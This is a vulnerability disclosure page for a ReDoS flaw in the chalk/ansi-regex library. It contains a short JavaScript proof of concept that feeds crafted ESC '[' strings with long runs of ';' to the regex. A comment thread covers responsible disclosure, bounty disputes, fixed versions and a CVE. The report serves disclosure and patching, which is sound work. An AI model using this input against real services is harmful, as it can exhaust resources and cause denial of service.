Inefficient Regular Expression Complexity in chalk/ansi-regex

Valid

Reported on

Sep 9th 2021


✍️ Description

It can cause a denial of service when matching crafted invalid ANSI escape codes.

🕵️‍♂️ Proof of Concept

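// PoC.mjs
import ansiRegex from 'ansi-regex';

// Time ansiRegex().test() on an ESC "[" prefix followed by a growing run of ";".
for (let i = 1; i <= 50000; i++) {
    const time = Date.now();
    const attack_str = "\u001B[" + ";".repeat(i * 10000);
    ansiRegex().test(attack_str);
    const time_cost = Date.now() - time;
    // Print input length and elapsed milliseconds for each round.
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}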

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

Occurrences

Yeting Li submitted a
3 months ago
Yeting Li
3 months ago

Researcher


Hi @admin, could you help me contact the maintainer to confirm the vulnerability and patch?

Ziding Zhang
3 months ago

Admin


Hey Yeting, of course. I've just sent security@tidelift.com an email, as per their security policy. I'll update you when we hear back from them.

We have contacted a member of the chalk/ansi-regex team and are waiting to hear back 3 months ago
Yeting Li
3 months ago

Researcher


Hi Ziding @admin, thanks for your efforts. The maintainer has now confirmed my disclosure and patch (see the commit).

Sindre Sorhus
3 months ago

@yetingli This is the second time you have been told to do a responsible closure. That means not submitting a pull request or opening an issue until the report has been validated.

The severity (and IMHO bounty) in this report is also too high. The issue affects pretty much no one as ansi-regex is mostly used for command-line tools, not in servers.

Yeting Li
3 months ago

Researcher


Thank you for your reply, @Sindre Sorhus. I just did a responsible closure on huntr.dev, but I accidentally pulled when I submitted the patch. Thank you again for your reminder!

Yeting Li
3 months ago

Researcher


The bounty setting may be related to the popularity of the project? I'm not sure, you @Sindre Sorhus can ask @admin?

Sindre Sorhus validated this vulnerability 3 months ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sindre Sorhus confirmed that a fix has been merged on 8d1d7c 3 months ago
Yeting Li has been awarded the fix bounty
index.js#L3 has been validated
Sindre Sorhus
3 months ago

Fixed in:

  • 6.0.1: https://github.com/chalk/ansi-regex/releases/tag/v6.0.1
  • 5.0.1: https://github.com/chalk/ansi-regex/releases/tag/v5.0.1
Jamie Slome
3 months ago

Admin


CVE published! 🎉

Yeting Li
3 months ago

Researcher


Thanks.